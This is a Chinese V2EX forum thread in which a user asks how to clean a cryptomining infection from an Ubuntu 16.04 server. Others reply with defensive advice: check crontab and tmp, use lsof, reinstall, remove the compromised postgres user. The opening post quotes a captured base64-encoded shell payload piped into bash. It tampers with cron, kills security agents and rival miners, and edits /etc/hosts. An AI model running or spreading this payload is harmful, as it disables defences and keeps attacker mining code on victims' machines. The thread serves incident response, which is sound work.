V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
15399905591
V2EX  ›  Ubuntu

找大佬求助, ubuntu 16.04 中木马了,杀不干净

  •  
  •   15399905591 · 2020-06-11 11:49:14 +08:00 · 1511 次点击
    这是一个创建于 1655 天前的主题,其中的信息可能已经有所发展或是发生改变。

    使用 top 查看到这样一个进程,干掉以后过一段时间就会出现

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    6625 postgres 20 0 2435624 2.035g 4 R 100.0 52.7 1008:52 yYGsf4

    阿里云那边告警发现这样一个脚本,但是找不到定时任务,怀疑是 postgresql 导致的,但是不知道从那里开始查找:

    :sh -c echo b1lyenF6TXcxS1J5SVMxS0RsdnVDeVFBdzBmNGh5SEs5cmxOcHluYlYwTVM0a0crTjQ2OHhaUVlDdmZVRHpvZgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pCmZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWkKY3JvbnRhYiAtbCB8Z3JlcCAtaXZFICJybS1tYWx8a2lsbGVyfGtpbGxNaW5lcnwuXC9va2F8XC91cGR8YXB0aXR1ZGV8YmFzaHRlbXB8Y29uZmlncmN8dG1wMDB8Y3VybHx3Z2V0fGtwY2N2fHh6Zml4fHRoMnBzfGJmZmJlfHJ2bHNzfHdsdmx5fHVjeGluIiB8Y3JvbnRhYiAtCmNyb250YWIgLWwgO2dyZXAgLWlSRSAicm0tbWFsfGtpbGxlcnxrbGxsTWluZXJ8Llwvb2thfFwvdXBkfGFwdGl0dWRlfGJhc2h0ZW1wfGNvbmZpZ3JjfHRtcDAwfGN1cmx8d2dldHxrcGNjdnx4emZpeHx0aDJwc3xiZmZiZXxydmxzc3x3bHZseXx1Y3hpbiIgL2V0Yy9jcm9uLip8Y3V0IC1mIDEgLWQgOnx4YXJncyBybSAtZjtybSAtZiAvZXRjL2Nyb24uZC8we2twY2N2LHh6Zml4LHRoMnBzLGJmZmJlLHJ2bHNzLHdsdmx5LHVjeGlufQpwa2lsbCAtOSAtZiAiLi9jcm9ufC4vb2thfC90bXAvZGRnc3wvdG1wL2lka3wvdG1wL2phdmF8L3RtcC9rZWVwfC90bXAvdWRldnN8L3RtcC91ZGt8L3RtcC91cGRhdGUuc2h8L3RtcC95YXJufC91c3IvYmluL25ldGZzfDgyMjB8QWxpSGlkc3xBbGlZdW5EdW58RG9uYWxkfEhUOHN8Sm9uYXNvbnxzYWx0LXN0b3JlfHNhbHQtbWluaW9ufFN6ZFhNfFgxMy11bml4fFgxNy11bml4fFxbc3RlYVxdfGFlZ2lzX3xBbGlZdW5EdW58QWxpSGlkc3xBbGlIaXBzfEFsaVl1bkR1blVwZGF0ZWFsaXl1bi1zZXJ2aWNlfGF6aXBsfGJhc2g2NHxjci5zaHxjcmxvZ2VyfGNyb25kc3xjcnVufGNyeXB0b25pZ2h0fGN1cm58Y3Vycm58ZGRnc3xkaGNsZWludHxmcy1tYW5hZ2VyfGdmMTI4bXVsfGhhdmVnZWRzfGh0dHBkenxpcnFiYWxhbmNlZHxqYXZhLWN8a2F1ZGl0ZWR8a2RldnRtcGZzaXxrZXJiZXJvZHN8a2h1Z2VwYWdlZHN8a2luc2luZ3xraW50ZWdyaXR5ZHN8a3BzbW91c2Vkc3xrc3dhcGVkfGt0aHJlYWRkc3xrdGhyb3RsZHN8a3cwfGt3b3JrZXJkc3xrd29ya3JlfGt3cm9rZXJ8TWFjcm9ufG1ld3JzfG1pZ3JhdGlvbnN8bWluZXJ8bW1tfG1yLnNofG11aHN0aXxteWdpdHxuZXRkbnN8bmV0d29ya3NlcnZpY2V8b3JnZnN8cGFtZGlja3N8cGFzdGViaW58cVczeFR8cXdlZmRhc3xyY3RsY2xpfHNsZWVwfHN0cmF0dW18c3VzdGVzfHN1c3RzZXxzeXNndWFyZHxzeXNndWVyZHxzeXN0ZWFtZHxzeXN0ZW1kLW5ldHdvcmt8c3lzdXBkYXRlfHN5c3VwZGF0YXx0MDBsc3x0aGlzeHhzfFRydW1wfHVwZGF0ZS5zaHx2VHRISHx3YXRjaGJvZ3x3YXRjaGJ1Z3x3YXRjaG9nfHdpcGVmc3x3blRLWWd8eDNXcXx4aWd8eG1yfHplcjAiCm5ldHN0YXQgLWFudHB8Z3JlcCAtRSAiMTAzLjMuNjIuNjR8MTA0LjE0MC4yMDEuNDJ8MTA0LjE0MC4yNDQuMTg2fDEwNy4xNzguMTA0LjEwfDEwNy4xOTEuOTkuMjIxfDEwNy4xOTEuOTkuOTV8MTE2LjIwMy43My4yNDB8MTMxLjE1My41Ni45OHwxMzEuMTUzLjc2LjEzMHwxMzYuMjQzLjEwMi4xNTR8MTM4LjIwMS4yMC44OXwxMzguMjAxLjI3LjI0M3wxMzguMjAxLjM2LjI0OXwxMzkuMTYyLjEzMi43MHwxMzkuMTYyLjYwLjIyMHwxMzkuMTYyLjgxLjkwfDEzOS45OS4xMDEuMTk3fDEzOS45OS4xMDEuMTk4fDEzOS45OS4xMDEuMjMyfDEzOS45OS4xMDIuNzB8MTM5Ljk5LjEwMi43MXwxMzkuOTkuMTAyLjcyfDEzOS45OS4xMDIuNzN8MTM5Ljk5LjEwMi43NHwxMzkuOTkuMTIwLjUwfDEzOS45OS4xMjAuNzV8MTM5Ljk5LjEyMy4xOTZ8MTM5Ljk5LjEyNC4xNzB8MTM5Ljk5LjEyNS4zOHwxMzkuOTkuMTU2LjMwfDEzOS45OS42OC4xMjh8MTQyLjQ0LjI0Mi4xMDB8MTQyLjQ0LjI0My42fDE0NC4yMTcuMTQuMTA5fDE0NC4yMTcuMTQuMTM5fDE0Ny4xMzUuMzcuMzF8MTQ5LjIwMi40Mi4xNzR8MTQ5LjIwMi44My4xNzF8MTUuMjM2LjEwMC4xNDF8MTUxLjgwLjE0NC4xODh8MTU4LjY5LjI1LjYyfDE1OC42OS4yNS43MXwxNTguNjkuMjUuNzd8MTYzLjE3Mi4yMDMuMTc4fDE2My4xNzIuMjA2LjY3fDE2My4xNzIuMjA3LjY5fDE2My4xNzIuMjI2LjExNHwxNjMuMTcyLjIyNi4xMzd8MTcyLjEwNC4xNDMuMjI0fDE3Mi4xMDQuMTUxLjIzMnwxNzIuMTA0LjE1OS4xNTh8MTcyLjEwNC4xNjUuMTkxfDE3Mi4xMDQuMjQ3LjIxfDE3Mi4xMDQuNzYuMjF8MTcyLjEwNS4yMDUuNTh8MTcyLjEwNS4yMDUuNjh8MTcyLjEwNS4yMTAuMTE3fDE3Mi4xMDUuMjExLjI1MHwxNzIuMTA1LjIzNS45N3wxNzguNjMuMTAwLjE5N3wxOC4xODAuNzIuMjE5fDE4LjIxMC4xMjYuNDB8MTkyLjExMC4xNjAuMTE0fDE5Mi45OS42OS4xNzB8MTk1LjE1NC42Mi4yNDd8MTk1LjIwMS4xMi4xMDd8MTk5LjIzMS44NS4xMjR8MjA3LjI0Ni4xMDAuMTk4fDIxMy4zMi4yOS4xNDN8MjEzLjMyLjc0LjE1N3wyMTcuMTgyLjE2OS4xNDh8MjMuODguMTYwLjE0MHwzLjAuMTkzLjIwMHwzNy4xODcuOTUuMTEwfDM3LjU5LjQzLjEzMXwzNy41OS40NC4xOTN8MzcuNTkuNDQuOTN8MzcuNTkuNTQuMjA1fDM3LjU5LjU1LjYwfDM3LjkuMy4yNnw0NS4zMi43MS44Mnw0NS43Ni42NS4yMjN8NDUuNzkuMTkyLjEzN3w0NS43OS4yMDAuOTd8NDUuNzkuMjA0LjI0MXw0NS43OS4yMTAuNDh8NDYuNC4xMjAuMTh8NDcuMTAxLjMwLjEyNHw1LjE5Ni4xMy4yOXw1LjE5Ni4yMy4yNDB8NTEuMTUuNTQuMTAyfDUxLjE1LjU1LjEwMHw1MS4xNS41NS4xNjJ8NTEuMTUuNTguMjI0fDUxLjE1LjY1LjE4Mnw1MS4xNS42Ny4xN3w1MS4xNS42OS4xMzZ8NTEuMTUuNzguNjh8NTEuMjU1LjM0LjExOHw1MS4yNTUuMzQuNzl8NTEuMjU1LjM0LjgwfDUxLjgxLjI0NS40MHw1NC4xODguMjIzLjIwNnw1NC4zNy43LjIwOHw2Ni40Mi4xMDUuMTQ2fDc4LjQ2LjQ5LjIyMnw3OC40Ni44Ny4xODF8ODEuMjUuNTUuNzl8ODEuOTEuMTg5LjI0NXw4OC45OS4xNDIuMTYzfDg4Ljk5LjE5My4yNDB8ODguOTkuMjQyLjkyfDkxLjEyMS4xNDAuMTY3fDk0LjEzMC4xMi4yN3w5NC4xMzAuMTIuMzB8OTQuMTMwLjE0My4xNjJ8OTQuMTMwLjE2NS44NXw5NC4xMzAuMTY1Ljg3fDk0LjEzMC4yMzkuMTV8OTQuMjMuMjMuNTJ8OTQuMjMuMjQ3LjIyNnw5NS4yMTYuMjA5LjY3fDIwNS4xODUuMTE4LjIwNCJ8YXdrIHsncHJpbnQgJE5GJ30gfGN1dCAtZC8gLWYxfHhhcmdzIGtpbGwgLTkKc3MgLWFudHAgfGdyZXAgLUUgIjEwMy4zLjYyLjY0fDEwNC4xNDAuMjAxLjQyfDEwNC4xNDAuMjQ0LjE4NnwxMDcuMTc4LjEwNC4xMHwxMDcuMTkxLjk5LjIyMXwxMDcuMTkxLjk5Ljk1fDExNi4yMDMuNzMuMjQwfDEzMS4xNTMuNTYuOTh8MTMxLjE1My43Ni4xMzB8MTM2LjI0My4xMDIuMTU0fDEzOC4yMDEuMjAuODl8MTM4LjIwMS4yNy4yNDN8MTM4LjIwMS4zNi4yNDl8MTM5LjE2Mi4xMzIuNzB8MTM5LjE2Mi42MC4yMjB8MTM5LjE2Mi44MS45MHwxMzkuOTkuMTAxLjE5N3wxMzkuOTkuMTAxLjE5OHwxMzkuOTkuMTAxLjIzMnwxMzkuOTkuMTAyLjcwfDEzOS45OS4xMDIuNzF8MTM5Ljk5LjEwMi43MnwxMzkuOTkuMTAyLjczfDEzOS45OS4xMDIuNzR8MTM5Ljk5LjEyMC41MHwxMzkuOTkuMTIwLjc1fDEzOS45OS4xMjMuMTk2fDEzOS45OS4xMjQuMTcwfDEzOS45OS4xMjUuMzh8MTM5Ljk5LjE1Ni4zMHwxMzkuOTkuNjguMTI4fDE0Mi40NC4yNDIuMTAwfDE0Mi40NC4yNDMuNnwxNDQuMjE3LjE0LjEwOXwxNDQuMjE3LjE0LjEzOXwxNDcuMTM1LjM3LjMxfDE0OS4yMDIuNDIuMTc0fDE0OS4yMDIuODMuMTcxfDE1LjIzNi4xMDAuMTQxfDE1MS44MC4xNDQuMTg4fDE1OC42OS4yNS42MnwxNTguNjkuMjUuNzF8MTU4LjY5LjI1Ljc3fDE2My4xNzIuMjAzLjE3OHwxNjMuMTcyLjIwNi42N3wxNjMuMTcyLjIwNy42OXwxNjMuMTcyLjIyNi4xMTR8MTYzLjE3Mi4yMjYuMTM3fDE3Mi4xMDQuMTQzLjIyNHwxNzIuMTA0LjE1MS4yMzJ8MTcyLjEwNC4xNTkuMTU4fDE3Mi4xMDQuMTY1LjE5MXwxNzIuMTA0LjI0Ny4yMXwxNzIuMTA0Ljc2LjIxfDE3Mi4xMDUuMjA1LjU4fDE3Mi4xMDUuMjA1LjY4fDE3Mi4xMDUuMjEwLjExN3wxNzIuMTA1LjIxMS4yNTB8MTcyLjEwNS4yMzUuOTd8MTc4LjYzLjEwMC4xOTd8MTguMTgwLjcyLjIxOXwxOC4yMTAuMTI2LjQwfDE5Mi4xMTAuMTYwLjExNHwxOTIuOTkuNjkuMTcwfDE5NS4xNTQuNjIuMjQ3fDE5NS4yMDEuMTIuMTA3fDE5OS4yMzEuODUuMTI0fDIwNy4yNDYuMTAwLjE5OHwyMTMuMzIuMjkuMTQzfDIxMy4zMi43NC4xNTd8MjE3LjE4Mi4xNjkuMTQ4fDIzLjg4LjE2MC4xNDB8My4wLjE5My4yMDB8MzcuMTg3Ljk1LjExMHwzNy41OS40My4xMzF8MzcuNTkuNDQuMTkzfDM3LjU5LjQ0LjkzfDM3LjU5LjU0LjIwNXwzNy41OS41NS42MHwzNy45LjMuMjZ8NDUuMzIuNzEuODJ8NDUuNzYuNjUuMjIzfDQ1Ljc5LjE5Mi4xMzd8NDUuNzkuMjAwLjk3fDQ1Ljc5LjIwNC4yNDF8NDUuNzkuMjEwLjQ4fDQ2LjQuMTIwLjE4fDQ3LjEwMS4zMC4xMjR8NS4xOTYuMTMuMjl8NS4xOTYuMjMuMjQwfDUxLjE1LjU0LjEwMnw1MS4xNS41NS4xMDB8NTEuMTUuNTUuMTYyfDUxLjE1LjU4LjIyNHw1MS4xNS42NS4xODJ8NTEuMTUuNjcuMTd8NTEuMTUuNjkuMTM2fDUxLjE1Ljc4LjY4fDUxLjI1NS4zNC4xMTh8NTEuMjU1LjM0Ljc5fDUxLjI1NS4zNC44MHw1MS44MS4yNDUuNDB8NTQuMTg4LjIyMy4yMDZ8NTQuMzcuNy4yMDh8NjYuNDIuMTA1LjE0Nnw3OC40Ni40OS4yMjJ8NzguNDYuODcuMTgxfDgxLjI1LjU1Ljc5fDgxLjkxLjE4OS4yNDV8ODguOTkuMTQyLjE2M3w4OC45OS4xOTMuMjQwfDg4Ljk5LjI0Mi45Mnw5MS4xMjEuMTQwLjE2N3w5NC4xMzAuMTIuMjd8OTQuMTMwLjEyLjMwfDk0LjEzMC4xNDMuMTYyfDk0LjEzMC4xNjUuODV8OTQuMTMwLjE2NS44N3w5NC4xMzAuMjM5LjE1fDk0LjIzLjIzLjUyfDk0LjIzLjI0Ny4yMjZ8OTUuMjE2LjIwOS42N3wyMDUuMTg1LjExOC4yMDQiIHxhd2sgLUYsIHsncHJpbnQgJDInfXxzZWQgJ3MvcGlkPS8vZycgfHhhcmdzIGtpbGwgLTkgCmNoYXR0ciAtaSAvZXRjL2hvc3RzCmdyZXAgLXEgcnl1ayAgL2V0Yy9ob3N0cyAmJiBzZWQgLWkgJy9yeXVrL2QnICAvZXRjL2hvc3RzCmdyZXAgLXEgdG9yMncgL2V0Yy9ob3N0cyAmJiBzZWQgLWkgJy90b3Iydy9kJyAvZXRjL2hvc3RzCnJtIC1mIC9yb290L2NsZWFyLnNoCg== |base64 -d|bash

    15 条回复    2020-06-19 18:08:55 +08:00
    id7368
        1
    id7368  
       2020-06-11 12:01:40 +08:00 via iPhone
    你得把文件也杀了,用 ps 命令查具体文件位置,不过多半在 tmp 文件夹里,到这里看看有没有乱七八糟名字的文件夹
    15399905591
        2
    15399905591  
    OP
       2020-06-11 12:22:12 +08:00
    @id7368 他这个好像是下载下来的,我找不到它在那里启动的
    superrichman
        3
    superrichman  
       2020-06-11 12:26:51 +08:00 via iPhone
    crontab -l
    ghostwwg
        4
    ghostwwg  
       2020-06-11 13:05:46 +08:00   ❤️ 1
    放弃吧,重装是王道
    vinsec
        5
    vinsec  
       2020-06-11 13:18:09 +08:00 via Android
    lsof -p pid 查下相关的文件 然后 lsof file 进一步看下相关联的进程
    7654
        6
    7654  
       2020-06-11 13:20:17 +08:00
    它的操作步骤都在那个 base64 里面啊,按图索骥
    wooyuntest
        7
    wooyuntest  
       2020-06-11 13:29:49 +08:00
    应该是通过某个有漏洞的服务打进来然后种了个挖矿木马,应该还有另外的脚本。 排查下 tmp 目录、crontab 、还有 ssh 公钥以及防火墙。搞不定可以让我上去看看。
    4linuxfun
        8
    4linuxfun  
       2020-06-11 13:32:43 +08:00
    先找出怎么入的,然后重装吧
    limboMu
        9
    limboMu  
       2020-06-11 13:58:22 +08:00
    前些日子,我在玩 redis 暴露在公网上了,也被植入挖矿木马。
    limboMu
        10
    limboMu  
       2020-06-11 13:58:57 +08:00
    @limboMu 然而,我用 docker 启动的,直接杀了容器就好了,为啥不用容器呢?
    Kelan
        11
    Kelan  
       2020-06-11 14:00:35 +08:00
    USR 已经很明确了发生了什么了

    另外这和 Python 有什么关系?
    asilin
        12
    asilin  
       2020-06-11 14:04:42 +08:00
    很简单,因为是从 postgres 用户侵入的,所以备份 postgres 服务后,关停 crontab 服务,使用 find 删除掉所有 postgres 用户的文件,kill 掉所有 postgres 用户的进程,然后删除掉 postgres 用户。

    只要 postgres 用户提权不到 root,那么其翻不了任何大浪的,干掉用户就完事。
    migu123456
        13
    migu123456  
       2020-06-11 14:31:23 +08:00
    把阿里云服务关闭,杀死掉,你这个很有可能是开启了阿里云那个 ssh 证书访问了,可以去后台删除掉
    lyi4ng
        14
    lyi4ng  
       2020-06-11 20:33:49 +08:00   ❤️ 1
    自己解一下 base64 看一下嘛,大概流程就是动了 crontab,按照进程名 kill 了一大堆进程,按照网络连接目标又 kill 了一大堆,然后修改了你的 /etc/hosts,最后删的 clear.sh 看名字好像是个扫尾的,不知道从哪冒出来的

    又是 ryuk 又是 tor2web 的,再看看你这个样子应该就是个挖矿木马吧

    至于干掉后出现啊,你现在给的这一大段就是个守护进程啦,先 kiil 掉行不行啊~看看这个 https://www.cnblogs.com/royfans/p/12722792.html

    至于其余的什么 init.d,systemd.d,LKM,ptrace 之类的应该还没这么大功夫搞你,就是个随处可见的开源挖矿脚本吧
    15399905591
        15
    15399905591  
    OP
       2020-06-19 18:08:55 +08:00
    @lyi4ng 感谢大佬,跟你所发文章的是一模一样的
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   887 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 22:20 · PVG 06:20 · LAX 14:20 · JFK 17:20
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.